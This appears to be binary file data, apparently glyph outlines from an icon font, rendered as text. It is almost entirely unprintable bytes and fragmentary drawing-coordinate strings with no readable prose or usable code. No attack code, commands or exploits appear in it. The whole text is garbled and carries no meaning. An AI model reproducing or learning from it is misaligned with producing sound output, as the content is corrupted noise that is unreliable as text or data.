=&\�	 		p	 		 	@;`��		0`���D72+"&=463264&"32#+"'&#"&=47>767632h

P

X e#


*!0H#5�
�

�
�y?#.) �M,:$���F46;2+"&56264&""'&'.'&=463276;23+
P

P
(#H0$

#e �

�

2��:,
(+� 
).#?$����"2"&4++"&=#"&?6;732e6%%6%�8
 
80%%�%6%%6��h

h�����$2"&42++"&=#"&=46;7E6%%6%p

@

%%�%6%%6k�
�

�
������/72"&4/"/&?'&4?'&67627664&"�P88P8V

^!
d0/d
!^

^!d//d
!cKKjKK 8P88P/d
!^

^!d//d
!^

^!
d�KjKKjK����".5463276EvE�j/7�]>J@EuFj�^6^y*���	%3!#!"&7;2=4+"%2#!"&=463 �
��
�hh 
	� 	
 ��
��
0		0
�����?E%+"/#54+""'"&4?&=#"&546;5'&4623762322#4
7=	
6(33(6
	=7

8/	
6�6
	/8
��\B�
 <
	7 �� 7	
< 
;.
	77	
.;B..����!"&5463!26=4&���`�|| `��d||�����2"&44&"2�Α�ΑH/B//B��Α�ΈB//B/���,B%&/#"&'&54>32+3276'#"&54673267�A>� #�		y�	9%�W5Ig=2B.*?>
!	��$!	 	 {7/:gI7Y'3.B7)����:%2+"=&=4?5&=4?54;27676265463t{eP1		71		78�		��		�Fb�dp�)
)
E3)
)
�MH����3<%#!3#5#"&="=435"=435463352#!226&#"Q//4E��	�(B+*7"    "7*+B(�	E5�4
#$#��%@((@%��#$#
p((@����%=2#!"&546322>36754&#!"".'&'3!265����
J(
��
(I	I

���`�5 

 	5		5�

����%9+#!"=#"=4?622#!"=4637335335332!54;��x��
�0
8@@@@@$�`$@XX��

�����#./+"&?&54767'&47%67"&57n���	8	0
�p�p�!'"U<

ss
	"U�,q%%q,
 �`DNe7#?%2#!54+54+"#";&'&767?6'&'6732%463!!"&57;2?3;26/&+"�&�

��@@r			





 ��
��
;		<		9	 	�&&!�
��
@x
	


		



##l
��
8		
����%5EU^n2#!"&546;254&+";26=4&+";2654&+";26=4&+";26=#"&=#'2+"&5463�

��

�
	.	�	 		 		 		 	�	 		 		 		 	0	��

 

 
��

�
	.	
�� 		 		� 		 		y 		 		� 		 		w@	0�@
��

@
����)5=IUa2!54;463!2;2=4+";2=4+"2=4+"354+"754+";2=4+";2=4+";2��@
P
��((((4(t(�(((((( �

�8�((l((�((�TT�((l((l((����)462"6+"&=#+"&5'&462376x*<**<�	_



_	
VfV
Z<**<*P
^��

pp

^
	WW	�����(3?62#"&#"#"&546&.'&>.676.7>.>�L\>&"LM"&>,�/-	�*,�-/	�C_&&_j4--
&A7 !-4
-!7A&7!���6/&=46?7575����������N�
hh
�HNN��P�B���!'+/37%//&=4?54?65'75'57'57'�dhhdad

d"UwfffUUfffVUUfff�	n
2442
n	$l	&&	lI$E�))&��K'O�''*FK'O�''*�����8U7/;2+".?'&6?67&"/&?6276/.?+/&?6326/&?6�	(3
44$6	3)	n|	$	"
j*(	n	(�-`PP`

"
�

Q!(0A"QI

--B
n�5+0PP0!,

���7APa2++"&=!+"&=&=47#"/&6;7>;2%!'.+":>54&"!264&#":�	
 
�
 
	< �"9���9
"N	
		06

  

60		*
& *22
�!	���19BJ%+"&=!+"&=&=46?>;546;232264&"7!'.+"264&"� 
 
�
 
 +
�
+��5
�
�#0$)

  

)%0#U" 

 "�]C�������/%++"&?5#"&?#"&?#"'&?>2++z
�		`		�
P	O
nn
O	F11Z[
uu
[����##".=4632"&= "&= ��]=g<�]=g<���G2G���G2w.+!.+!{g++g1og++g1����&BKO7.4326673#!"&546;&'6'.32767326'&7#532'6�3
O��
��

�&$>$

O�
%+�(6V
	��

�
�
�$/
76 &
>"	�
�������<E;#!"&546;"&'&+"&'&+";27673;2?6.#7#532�
�
��

�9
	

%
%		&
&O�
b8
��

�
�
es		s_
	�		cX		���b����4=;#!"&546;6&+"4'&+";2767;26/7#532�
�
��

�<#%%#<<#"#<��
b8
��

�
�ED
]^=!$^��b����"=72+57#532;#!"&546;4&+";26=:>�

��
7
�
��

�5(!Q�=�
��
��

�
��!,�9����"-#5323#!"&546;"2645'&'&��
b��
��

�j''�(	g((F�b0��

�
�
((�p(h((0����*.O#5322"&5467;#!"&546;3533526/&+535#535#535##3#3#y�
�		w
�
��

h @� 2
           W
���

�
��

�
     ��&W
            a����!/=F;#!"&546;54&#";67764'&7&7647#532�
�
��

�@$$!
		O
	
)@�
b8
��

�
�l�$8$8	;n
N	*u��b����4#532;#!"&546;4&54&+";26=65��
b�
�
��

�`7
p

p
7F�b
��

�
��7&

p

&7����3G`#5323#!"&546;7654/7654/&#"32032?454/0#"764/&#"327��
b��
��

�s((AA5>>�A((F�b0��

�
�
�$$==1��g=$$����
!'2"&4%&'264&"'677&'67'�Α�Α�?�P88P8 @m?�@��Α��@�8P88P�?�@m?����#46#"&'46762654&'&5 QiBrCg�iQ:Ll�lL:��VCrC�gV�b?LllL?b�����6/&=6&'.7�
H
}@
 ���j
��P4M
Q%�,����%7#"'.?>3264&#"+"&=46632/546;2��gXD2@LllLI53�	2Hcg$A

)'͒7(l�l23	�2E��3�

h ����K32+"&=46;5#32+"&=46;#"&=46;2+35#"&=46;2#� 		�		 � 		�		  		�		 � 		�		`��	 		 	��	 		 	@	 		 	��	 		 	 ����!++"&5#+"&=#"&46;2�	0	 	 	 	 B^^B�	� 	��		p��		p^�^	���#Gk%2#!+"&=#"&=46;546;2%2++"&=!"&=463!546;272++"&=#"&=46;546;2�		��	 	P		P	 	P		P	 	��		P	 	P		�	 	�		�	 	@	 				 			�	 				 			�	 				 			����%%2"&547'#"&46327&5462#"'6`(88P8f"(88("f8P88("ff�8P88(
@8P8@
(88P8@

@����5#!"&5463!2"'64'73264&"&#"327264&���`�DD!!.!D!!D!.!!p��`�))!.!!)!.!)!!.!���'/7?O"&4632762?2+"43&2"=&?6'&6/&6463264&#"26�4z�zzV-)4M0.	U	;	��&		(8		h4)-Vzz�z4<+					�&		8(		����%*"&462'7&''77'77'?6'7��Α��a?"'>KK>'#?&U%>>%U&�NN'Α�Α�:T6**6T:B4"MM"4\88\
���!-9EQ]iu�����>#"/&5057&0#"/&54+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2D��D
+W``W+`((`((`((`((`((��((`((`((`((��(( ��`((XD11D

E#
<##<
#E�(((((((((�(((((((�(((((���	3=A#546;246;#+"&=>%+"&=#532%2#546353�`	@	��
` 
`


�
`
 `		��	`	p@�00		w
��

,$;)%-9)G,,

��	w	00	�������#+#54622+#5.=#"&=4637#5462@@0		I7@7I		p@�``
�	 	 9YccY9 	 	�``
@�&2>JV2#!"&546;54632=#72=4+"3!2=4+"3'2=4+"3!2=4+"372=4#!"3(
�(!
(
(��h�8�h�����
��!

����``((������,'& /&47>2"&4%'&"/&4762{"n��n"W��6%%6%"?�?"W�%"dd"Q99��%6%%6y"

66

"L����/?O_o2#!"&546354&+";26=4&+";2654&+";26=4&+";2654&+";2654&#!"3!26���P&&&&�&&&&�&&��&��`��M&&�&&{&&�&&{��ff������#/7'&?66754621%#".547>"&53z	
��	
�%=8H	�~��		�&�


	�

	p1


V:,C
��	
2�%����!2#!"&=46;76;2!+"&�		�`		x	r	�����	 		 	

�MS������82"&4654/.#"&546326?654'.#"32>�Α�Αm
#'("$
>R$C) 8��Α���"	0 !+#	R=)B&����:F2#".'#"&546326;2>54&#"3276#"&462654&#"j�JL
*,4Q9*- jNLllL6-
	=Jg��Q%$�|d?T91BVy
2JVl�l	(�Α��)) ���#?+'754"/&4?62763~�~-8  �8M
)�)
Ms~�~  8-`8PM
)�)
M�����,70#"&532762#"/&54>76�XF:@@
j UP.
@	'%?�J8@XC			
D:�a5	#8����#4?JU%"&""&#"#"&"#546;5335335332!526226226323"&546523"&546523"&54652�'/''(
'/'@@@@@�@''/''/'
'��
 
r
 
r
 
@      P�������`      @
%&
%&
%&�%2#!"54;2%6!57>��(5Z��W
U@(h����h�r����!�#%2/7+5463&'&676
=��	�
Y���<K`�wZ�S:
�A
�	���+�`\�	�2%2#!"&546;22/"//&?627'&63�		�0
	 	�	 `

I.D

II @	 	
P		�� 	v `		J.E		JJ @�2+"&463264&"264&+�PppP�PppP�KjKKj�5KK5111�p�pp�p�jKKjK�KjK7�7@�2+"&463264&"�PppP�PppP�jKKjK�p�pp�p��KjKKj������8<KQg2'.547'+#"&546327#"&54>;23'#"&=46;263&267#"&?&#"?#654&#"&/5KK54K)V
4E,5KL41
W	r3		@
N��+J(	Q-	!//�J�$�"2/!

-

-,M55JK48&�*6K64K0
			}J&vI/B/`x( 0`0"!/H
	G,���4<LT2+++"&=#+"&="&=#"&=46;5462264&"7!26=4&#!"264&"�


 
�
 



�����0

�
@
P
� 

  

 
�
P
0".."0��]
�

�
p�'?2#!"&5463&546?6'.676/&&546?6'.676/&��`�=@RA?S�>@RA@R��� �%"4./6%"4./6����94&++"&546;2+"&52+"&546;23265463�!p	0	
�8P	0	�	P8�
	0	p!	!��		�
P8�		0	��8P
		�!(	��B�3W%!!2#"&'&7#'.'4>7#"&=46;2!2'#54&+"#";;26=326=4&���
 ! �#
	FF

g
	�/t0		0		0		0		� #! !W

	-��(		(		(		(		��B�3F%!!2#"&'&7#'.'4>7#"&=46;2!2'#54+"#"?6&���
 ! �#
	FF

g
	�/y++DD� #! !W

	-��<<DD����<D%32#"'+".'#"&=463267'&6?546;546;232%7625�=,

X70�#7X

,>
F*
@
�
@
*��v
vK")

;!;

)"F
#�
(

(
�#
�X&&X����26:V%#!"&=467'&6;&5&54767>?6327/77475#"'0326762676�#��%
:@F

F@;
� 2�*2J,42.	�=#--$><!

1"		"1

!�x( �� (�������HWm2'"&547'+#"&7>767&+"&546;23'#"&=46;276;2+6267#"&?&#"%6&#"&/7>4KL64K-

TE,6KH2 8

8E�B		P&-

R ��(	Q)!//�0"1

22"+K46LK4;')-
*6M63H

( 		&*
 
7�K/B/L"2Q
R "0+���$@%"&54672654&'56&"&462"&=46;2732#+"&5pAO�ԖOA!3z�z=3M6%%6%�
&

@
v.(88(.	!!�%6%%6�
``
`

�����
)%3"/3727#'&"'&"#&6?62762@m��^9�$!w1:$f!$&n''n&�,��H		
%i(7		b�	
V(i%((''�� �!)32++"=#"=4;5.5462264&" ?1$$($$1?TxT�/B//B3N4($$(4N3<TTB//B/�� 2/"&46327'&63264&"tQTxTT<*#P�B//B/�OP#*<TTxTQ��/B//B�� �;C%32++"=#"=4;5.547&'&'&6;227676;2264&" ?1$$($$1?3&(
F
(&3�/B//B�3N4($$(4N3C+ /

/ +"B//B/����192/32++"=#"=4;5.546327'&63264&"tQ?1$$($$1?T<*#P�B//B/�OP#*3N((N3<TQ��/B//B����PX2/32++"=#"=4;5.547'/&?'&=4;276627'&63264&"�Q?1$$($$ 3			O	#T#P�B//B/�OP#*3N(((;"*#	O	Q��/B//B���!)W32++"=#"=4;5.5462264&"32++"=#"=4;5&'673264&#"&'632 ?1$$($$1?TxT�/B//B!$$($$"!//!"'2<T?3N4($$(4N3<TTB//B/�4($$(4/B/ T<3N���!N2"/"&46327'&63264&"%2"/#".'672654.#0"1677'&63T
1TxTT<*#0�B//B/�
1T<%?'!/B/%!0�O0#*<TTxT1��/B//BQO0#*<T";$!//!%!1��@�&HP2"/#"'673264&#"&'6327'&63232++"=#"=4;5.54264&"4
1T<2'"!//!"'2*#0�oxT?1$$($$1?oB//B/�O0#*<T /B/1@T<3N4($$(4N3<�/B//B��+32//"&54>327'&?67'&63264&"t			TxT'B'*#	�B//B/�O			#*<TT<'B'			��/B//B��!�,47"&47675#"&=46;5#"&?6+32+64&"�*TxT*(88('//B//�*xTTx*	(88(	�/B//B/0�P(0%&=#+"=#"&462354;2354664&"�		8(	*xTTx*	(�//B//�8(*TxT*(�/B//B/�� �+"=.5462264&" ?1(1?TxT�B//B/3N��N3<TT�/B//B0 P"264&2"&4�B//B/�xTTxT/B//BoTxTTx	���/7?OW_!"&=463!2&"264&"264!"&=463!2&"264&"264!"&=463!2&"264&"264�@

�
3NX�@

�
3NX�@

�
3N 
@

@
X�
@

@
X�
@

@
X����#+?%2++"&=#"&=46;546;2"&4622#!"&=46;27p		@	 	@		@	 	��jKKjK&7O��O7#L#�	 	@		@	 	@		@0KjKKjkO7**7O����#7%//&?'&?676"&4622#!"&=46;27N-..--..��jKKjK&7O��O7#L#�.--..-->KjKKjkO7**7O��+6"&462%2+"&=!+"&546;235463�B//B/.B	 	�	 		 	�	�/B//BQB.�		00		`		А	����'/##!"&?"&546;254&#!"3!26"264�N4?��?4NO1�2N0
��

0
�.!!.!`�'9229''99�p

p
6!.!!.����'7?G##!"&?"&546;254&+";26754&+";26"264$"264�N4?��?4NO1�2N�
h

h
�
h

h
((��((`�'9229''99�p

p

p

p
.(((( �`!%!!535#7232+#!"&=463!5 � �  

��` �@@�
�
�`�� �`!%!!535#7232+#!"&=463!5 � �  

�p�� �@@�
�
�`�� �`!%!!535#7232+#!"&=463#5 � �  

�� �@@�
�
�`�� �`!%!!535#7232+#!"&=463#5 � �  

��� �@@�
�
�`�� �`!!!535#7232+#!"&=463 � �  

� �@@�
�
���D�%#&/&546.j81
5W	w��Y	
�	�����H#"32+72#".'#"&=4632=#"=4;54".=4>32>32T$$T-.T$$T-.�0p(p1((0p(p1(���,8G32+"=!+"=4;#"=4;2!54;2+;2=4+"54++;2�(��((�(����@T
H�@��((@((���H
4��@�+]7+"=4;5#"=4;2!54;2+32+"=732+"=!+"=4;53;26=4&+5354;2+@44 44�4��4�
@

h4�4�44�4@�44H

@
H4����%"!"&5463!2+538
��

�
b
��
�
�

��7b�
���!2#!"&54633#!"&546;������0/��� �`0 �!/������47c%"&5054676762'3#"&505467>762'3'2#!"&=46;&'#"&=46;6232+KjK

<

�H��";#5K

<

ȐH		�`		�&�		�N�		�&p!//!<4&(59	��%/!<

(59	���	 		 	')	 	  	 	)������*02#2#!"&=463467.5"&=4634&"h

D55D

��

D5#7

=V=�

CkkC



Ck8O-

�@;UU;����*062#2#!"&=463467.5"&=463."65#h

D55D

��

D5#7


2<2
���

CkkC



Ck8O-

��$,,$""����*02#!"&=463467.5"&=463!2265#hD55D

��

D5#7

P
�V=��CkkC



Ck8O-



�U;;����*2#!"&=463467.5"&=463!2hD55D

��

D5#7

P
�CkkC



Ck8O-



���?2+"&=4/&=463254632354632354632346�

0�
p p
�t
d+B0�0/ ������72+"/&>54>32354>323546323546�

�}
!	 



@�q�!
,���ױ�W���-4635#"&46;5#"&46;5'.7>7>+"�  �в$�	
p�P	""(E
K@� ��@�$54/&+"&=46;2?6&+"&=463!2�p�
%|

�!
N� =G
%3	!
��t���P+"/&546324/&54>3232545'&54>3232?>32132?>32�D	8%6'l
=*	&3

8&	"/��#-%f9)(�
	}�
��	�{������-159%+"/&>46235462354623462#37#37#3� ��
!	 """"�XX�`��!
,�((a`````������+$2+"/&6?'&>354623546234�" �@K%$E("�P�p
	�$���   �`G2++"&=#"&=43+"/5#+"/#+"&76;236?6;2U6Ut
6		2		6A	+	+	A`+��+��
�6"UU6�(5 ����*%+5326"&462&'654+";26=3;26ۑΑ��+&jG		
,�8'Α�Α��O2Y
�

HS
����#'2+32#!"&=46;5#"&5463!P�		�`		������ 	 		 	 @�� ������+G!"=46;54;2354;232!2#!"&544+54+"#";;2=325��X0(�(0�L���H<(<<(< $4444$ ���<<(<<����+7!"=46;54;2354;232!2#!"&542=4+"3��X0(�(0�L���<� $4444$ ���((����+G!"=46;54;2354;232!2#!"&5476/&'&??6'��X0(�(0�L���
0			00			00			00			 $4444$ ���0			00			00			00			����+;!"=46;54;2354;232!2#!"&54'&'&?6��X0(�(0�L���Y	j.			R	�	 $4444$ ��`	j/	T�	���6#!"&546;276�
�0

p
���

�

�XD�� �	727"/2"&4724#"2546pxTTxT�&6(��!!�TxTTx6&(�����$9#!"&=46;546;23253+"&2#!"/&?6;53�+	�

�	 	�	�@	 	�

�	++	�@k,	
P
			�9pp		
P
	,,	  ��@�4?&576�����	�J8��?
0�@�����8����2+&=#"&5463�&&�}
`&&�&��&^T& &����'2"&454&+";26754&+";26�Α�Α�	0		0	p	0		0	��Α�η�		�		�		�		����2"&454&+";26�Α�ΑX	�		�	��Α�η�		�		����!)3#!"&535462#354&"264&"264&"``/!��!/`KjK��&4&�� ��!//! 5KK5  &&���@�*6BN%+#!"&/#"&=46;7>3'&>3254&"26754&"26'54&"26@

��

CkP�PkC
��p��
��

�mm��p

p

p

p

p

p
������CG+32++"&?#+"&?#"&?6;7#"&?6;76;2376;2327#�
OK
P
(b
)K
OK
P
(b
)K�c

�	(
V
	RV
	R	(
�	(
V
	RV
	R	���������-6"&462&"2642"&4264&"32+"&76�\BB\B\((�\BB\B\((h ��"	p�B\BB\^((�B\BB\^((��0
�
����G"264$2"&462"&46"264>."'&67673>'.56V�zz�z��Α�Α��pp�p�RHLH5	




	�z�zz���Α��Yp�pp�DM

/A.!!.A/����B#"/67'&/"&462&/&#".?5#"&=76;2|}~�?$$$ofB6

= ?��Ú
X<$$��'l�	
��P
_O		�7G7#76772+57#!"&5463!2'&+";2?3;2>74.+";26�		�/��`���9	$9	4	�-99.5�

1b_�� ��		T+�4����!3CS.676#"#'7232#"/&764'&?67/&764'&?6/&764'&?6a@-.?
@	 8  8 @�		_--
	%%	
&

;@��@
(
QZZQ
(�"V6�6
	-t-	7#X#
	B	��'/7?GOW_6"&4622"&42"&42"&42"&42"&42"&42"&42"&42"&42"&42"&4�%6%%6(6%%6%�6%%6%6%%6%��6%%6%�s%6%%6��s%6%%6��s%6%%6��S���8@H`d7"&5462"&54&"&2#"&4632654>54&""&542"&42"&4%"&54=.'.7>'7�/B/1�g?-FdFSmQ@
	Qf��"P"�!//!
�gI+	-?%&2FF2I�m�Do	�V�"P"������2At�&2#2#'&/&?6766766&#"32763&%.6767&'&>767'.7>7"'&63"&7>376"#32654&# !=+^C,:)
F
"(-+
%

	
p:)
F
"(	-+
	 !=+\C�

3

	!Y	!JZ9
	


A
4!JZ9

	


3

	!G�����8DQ7"&5462"&54&"&2#"&4632654>54&""&54%/&?6"/&?6�/B/1�g?-FdF�		W	W	��		�
		��!//!
�gI+	-?%&2FF2I�	W	W		��	�	�	������2?k46;5#"&546;5#"&546;5#"&746;'.>+"&7'&6767054/&'&6767'&6767'&676'&>[
>~��}�
	|PkI%		

�
={4	
N^
	_M
	g$Z
��.

#

0ZC	
cy
	zb
	�&����@�-E%&'#"/&'&767'&6?6632654&#"6"326591W+
��)w
}q<1W+
5(*Y��"P8*&�T+:
e	
��:��(fT+:
H
W�'38P	
=���� (/7W2&/76'&"&'&4757633#"&5:64&"3#&"264///#576;?�
	7�

P
"


b	
�`@
)			��`
				�
		
 	5[7	
TR;�	7�vI
!Z@�
			)�
@			

	&
R�7	K<���F#!"&547670>321&0#".'&'&2>767654'�`)||)B#G
G#	$FF$ Z		Z B3		32


2����'/D#32+32+#!"&5463!232&"26454&+"'#";26���@�4&&4&0'*
	�	
 @(@(0�0( &4&&4�"��@�+7CO2#!"&5463"26454&+"'#";26754+";2=4+";2=4+";2� �4&&4&0'*'
	�	
����������``&4&&4�""=HH����2"&4$"26427.#""'&#"�Α�ΑH44H4��94 ( 4��Α��14H44H��D!!����#72#!"&5463";264&#"26454&+"'#";26P��`		`		4&&4&0'*'
	�	
��`� 				�&4&&4�""��@�	+7?R2!5463!#!"&%;2=4+";2=4+";2=4+"&"264;26'.+"'#"��0@� `�������4&&4&�
�
"*��p0���HH�&4&&4�
�����3C#0#"&54754622654.'54&"37"&5475462� K55J 8P8`!/(%A%6%  `�%05KL50$�(88�h/!			��
		%P%%%�

������"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%�

�0%05KL50$�(88(��			��
		%/�����"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%i

i0%05KL50$�(88(��			��
		%/�����"C7"&54754627#0#"&54754624.'54&";26�%6%    K55J 8P8(%!/@%%%)

)0%05KL50$�(88(��			��
		%/�����;6"&4627#0#"&54754624.'54&";26�%6%%6E K55J 8P8(%!/[6%%6%%05KL50$�(88(��			��
		%/���'/7?GOW_gow�$2"&462"&4"&462"&462&2"&46"&462462"&2"&42"&462"&42"&42"&42"&42"&462"&47"/&4?&547'&#"#+"&5462632762)			)			7			)			7			�			@			 			i			)			7						7						I			&� 
	 	Ie#
. �			i			7			)			7			)			 			@						)			7						7						I			�� .
$��		/4M$
 ���I75!+"&=!+"&=&%2#!"&=46;5462662"/&47&7'&" � 	 	�	 	 �		� 		)9-#
i
@00+)				)�				�)
i
#,	�����+QY"'.542''&546'&'&7654&2&767>54.#"'.542"&4J�u.W=9R0;)%5��F8%,!+6Ig*$9E�6%%6%)U,,U�
+>=UQ9A,
()95%+�]BlN.5, gH-NlB]%6%%6���2#!"&546354#!"��`������`�TT��`%2#!"&=463��``  ���!)+54&+5463!2#!"&5463!24+"30/!� ��� D������!/0��� 04	���/?O_o�+"&546;2++53232++53232++53232++53232%3#"=#"=4;5473#"=#"=4;5473#"=#"=4;5473#"=#"=4;54���`********�********��`�N0f0f0f00`0`0`0�������%/&/"/+"&="/&4?5/.?/&?'.?>7'&/&6?'&?6'&>?65'&4?6546;2762?>76/76�!?5

 	
6?!"F@@F"!?6	 	6?!
"F@@Fg

G$N5
(		(
6N$G

%%

G$N5
(		(
5N$G

%%����	�'"/&4?&67>�(0$X%�	3	�
$1��*�1$
�	3	�%X$0����*<+"&?.5476227>56227562.>32+"&7�% 

@

,,,y,"*9

8�_"&7�

�*"_�G;����#VLB&
�0

����&2#"'&?632676&+"&=466CrC�g_G
	(0?FaeEB0*�
$G�BsCg�@	(*bEGc,*
�$E����	!-E!#!"&26=4&"26=4&"26=4&"%2#!"&=46;76;2 ���				`				`				@		�`		x	r	P���		�		�		�		�		�		�	 		 	

����:&#"+"&7>3276+"&73232>76;2#"'&=46s1B:[
9�ZcH$
��׆*1B&D0	
9�ZcH$;-G8		WsE$�
y*-!9%		WsE$�
����"0%"&54675#"=4;2+7654&+";2�z�zeKx8,			"�((�VzzVMu"(("	$			3b������1%&=#"&=46;546+"&=46;2+";2��

����T(88(TT

T��`
`
`��8(�(8(
�
���1!#"=4;26=4&+"=4;2'&=#"&=46;546�TT

TT(88W��

�(
�
(8(�(8��`
`
`����$276+"&?&'&3276#"&46dG$
�*0BEeaF?0(	
G_g���E$�
*,cGEb*(	@�Α���08DL%#!"&5467&546;&546;2654'6323232$"2646&+"26&264&"�#*��*#*&!/	(8&*����<8<%O(**(#*&/!8(&*#[x  `��@�!)4%#!"&546;3%#!"&5463!24&"2!5'&'&���/!������((D`X�( �!/PD((`0pX�(�����
!(/&?62'6&?6?6&5#75�.	o		.(<�	o		��z\
�

�$$ @2.		o	.<(		o	��z 
�

�h0@ $�����&?'762#���r
�9�9(c���
r)(9�9�����	'762&76?'/&?62�9�9(�US�Qr
Q�fw!v(9�9(TS�Q
rQ�fv
����732"/&6;4;2�.VV.8fVV.��M�37/&4?6!2#�VV.�.VV.8M�3%546&=!"=43:VV���.VV.8
����#"&?62++"5X.VV.8VV��������;%+"&?'+"&=467'&=46;27'&6;2/76�
p$kk$p
$kk$
p$kk$p
$kk$hp
$kk$
p$kk$p
$kk$
p$kk$����)#!"&546;46232&"26454+";2���P&4&P�H��P��`&&4d��M346&=#/&4?63zVV�VV�VV..VV.
����72"/&6;5#"&?62+�VV..VV.FVV�VV�����"&462#"?6&+54+"��Α�ΓGssG@'Α�Α�tsst����"&462'#54&6=32=4gΑ�Α�tsst8�Α�ΓGssG@����2"&43?6/&#"�Α�Α�tsst��Α�ΓGssG@����6462"75326/&;;2�Α�ΓGssG@YΑ�Α�tsst���4%2#!"&546;2+!54632/"/&4?'&63�	���		�@	X
$��$�	�`	 	��p	@
�$��$����##!"&5463!2#"?6=4&���`Xp �			� p��`$ �			� p
���+5463!546&=!"&2#!/&4?6
hPP��
�

��PP
0PP0�

0PP0����1%#!"&54674546326326&+54&+"#"7.K5��<T6*^B,J(8�A	0	Aj�$65KT</JB^,$8(ip		pj����1%#!"&546745463263226/&;;26=.K5��<T6*^B,J(8�jjA	0	�$65KT</JB^,$8(Njjp		p��@�#'#!7#3#3'!"'?3&�ZeE0E��E�PEee{G�C{e������� ����B������E�%"/&6;#"/&6;232:hh
@T8�
@8pp8
������E�++"&?6;#"&?62:
@
�8T@
hH��
8p��@�&2+"&=4&#"32#!"&=46;54i}Z
 
+*0����Y?P

P*+G��F@����.5462"&264&"�="
p�p
"=B//B/6#X$5"PppP"5$X#
�/B//B��`�0R232+"&=46;5.=46;26=463"&=462#";#";#";P	WA8		�		8AW		B19T	hP88P8UUUUUU	0Bc	"				"	iD(		*3NM80	�8(�(88(  (��@�#2+"&5463264&"74+";2�c�����`�� Y8����-27?DI%2+"=4;5#"/&54?6;2%2#!"&546334&#5265#264&"5"75#`@

��

@%%@�P88P8p%@@%�7
X�
��

@
��%�%�B\BB\b@%�@%������
(%67#"/&?6'&?667'&?6Py�p�
��	

a<0heC>Wh0�

�

	��$%2p������+2#!"&5463"26454&+"'#";26P���4&&4&0'*'
	�	
��`��&4&&4�""����� 76&7>.'/&4�4PL20#	.6"��

P	)B,,U2&
X
�����'.54>?62>7'�.=9*M@'	�Kc�l?sSC)C_�G
P�F%�lJ����#2#!"&5463264&"74#!"3!2�������H��`�� Y8����@�
&.BLT2#!"'&54%"32?4761.264&"6264&"%6.'&3654'73264&#"264&"��'	�D	' 		
			�C
=#	n	L


.��wNCCNwi		

���5
		�%�@�/!!$3#!"&=264&#5463!2"'4&#!"3!265�@���� �L
��

P
 �t(``(``8

�

���$"&4622#!"&=46;27<xTTxT5K�`K57#L#�TxTTxtK55K���+2#!"&5463'76/&'&??6��`LCC		(		BB		(		CC		(		BB		(	���`��BB		(		CC		(		BB		(		CC		(	������'?'&6;2//&+"&=4676c!p
c�c!p
cc
p!cbc
p!c����(7+"&=4676?'&6;2//&�]!p
]]!p]�]
p!]k]p!]���� &,%#"'67'&477&'6267&'%6'77&7p!HddH 66 H�H 67���T'FF'!D�D!&FF&!D�D"MM
CC�MM
BD����
 &+'6'676'7&'%'67%&'667�*N5i.9S?��N7M
<.�4b�.8S?^N7M
��.�4b�*N5�M7N,�.Fb4"N*E�.�?S,.Fb4"N*E�.�?S�M7N,����2"&4264&"6264&"264&"�Α�Αk`��Α��'Z����;Ss{�7'&546;5#"=4;54;232+3232+#65#"&=463+"&=4?546;27'&=4;2354;2354;2#7354&"+"&=4?546;2J"	99	"
		�		�		�			�	t6~/ 		w		�			�	�Z	  	Z		A??A		�
		
		�
;;
RP  		�
		
		��@�#37467.546;22?#5&2#!"&=463G*
@
&!ld8�8(		��		�5�"

=le<+C,,]	 		 	 ���#'+/37;?CGKOSW[_cgkosw{#53#7#53#'3##53#5#5#535#5353#5353#53353%3##53533#753'533#%3##5353'#5373#3#'#553%#53#@�@@�@�@@�@@�@�@��@�@@@@�@@@@��@�@�@��@@@@@@@�@@�@@@@@@�@@�@@�@�@@�@@�@@@@@��@@@@�@@@@�@@�@�@@@@@�@@�@@@�@@@@��@@@@@@�@@�@@�@�@@�@@�@@@@@��@@�@@@�@�@@@@@�@@�@����5!2#!"&=4632!'&546;5#"=4;54;232+�		��		p
J��J
�((0((	 		 	 
��
00((00������%-=7&=4?'&54;2!546?6=#"'4"2642#!"&=463	�Oq��9
	(		��		��
	pP�&

2���	 		 	��@�#37.546232+#6=#"&=4632#!"&=463i=V=		�		�		��		�/+==+/	 	P++P	 	�	 		 	�����I"&4622#!"&=463!'&54?6323>546;232>76;23276.!!.!x		��		�f��f
''
P!.!!.��	 		 	��	




����#+;2!65'546;23546;23546354&"2#!"&=463p	@
��
@	8	0	P	0	X�		��		�	� VJJV �		00		00	��@

@�	 		 	����/S2+"&=#"=4;54632++"&546;2'2+"&=#+"&546;235463h

0

@
0

0
�

0
�
0

0
�
`
��

h0h
�0h



h�
�p

��

�

��
����
Q'&'&'&'>7'&'&'&??6/7?6/7?6/76/&�
�63�4
�63�g��gf�45��[45��o��o�T����#-8B73+"+"=4&+"&%#.54622654''4''32674''326`�

(

@$�-5z�z�H
@ 


�5,&]7Vzz�/

M�<62"'67"&5�Ԗ�Ԗ7��7�Ԗ�P88P8((n(88(����#5%/6?6&67>32"&54>'7>76W
�65_<Q	"..C.�
�";V"�
�m($*
 pJ�/B//!A
�+m7+�	���!!�@����	�
'%&'762&/"/&4?'.72"&4�0q"�8?�?/�)$Y5g#	>P88P8� /�8??/��$g5Y#Q"�8P88P������	%-;7&'>7'&67&'&'667&'67#"'6#"16&�5K$`D$>_GE#�70Z0344�LS)(F�>!3v�E[F;
�0K*,-'�!c=#.Gr 2Oc?Q�&��]2�U(
1)+,GR;$/�D_5E�������:BJRZbjr2+"/&>5462;2=462;2=462;2=4264&"6264&"264&"6264&"264&"264&"6264&"��}
!	�							I							I			)			)			P
�q�!
!�

��

��

�H
��			W			�			W			)			I			w			 �`	'/746;#"&52+!&"264"264&"264"264&``&@&&`��Fn &��&&�&@��@���RnR���	0#532'#617>3!#!"&5����3c�`�
!������@�)>%2+"&=46;75%"&=46;7532#2+"&=46;750		�		P  ��		P  P		�		�		P  �	�		�	``@	�	``	�	@	�		�	``���92#!"&546;546;2'3554+54+"#";;2=32��`P��� 808808@�� 00   �088088����
"&5462654'�Ukk�kj,T6``�M�:^vv^:���5*8ii8*��G�%/%#"/&'"&=46326763254&"7'&#"+'$<"�B\BB.-@
$<"��(#RA�']1�
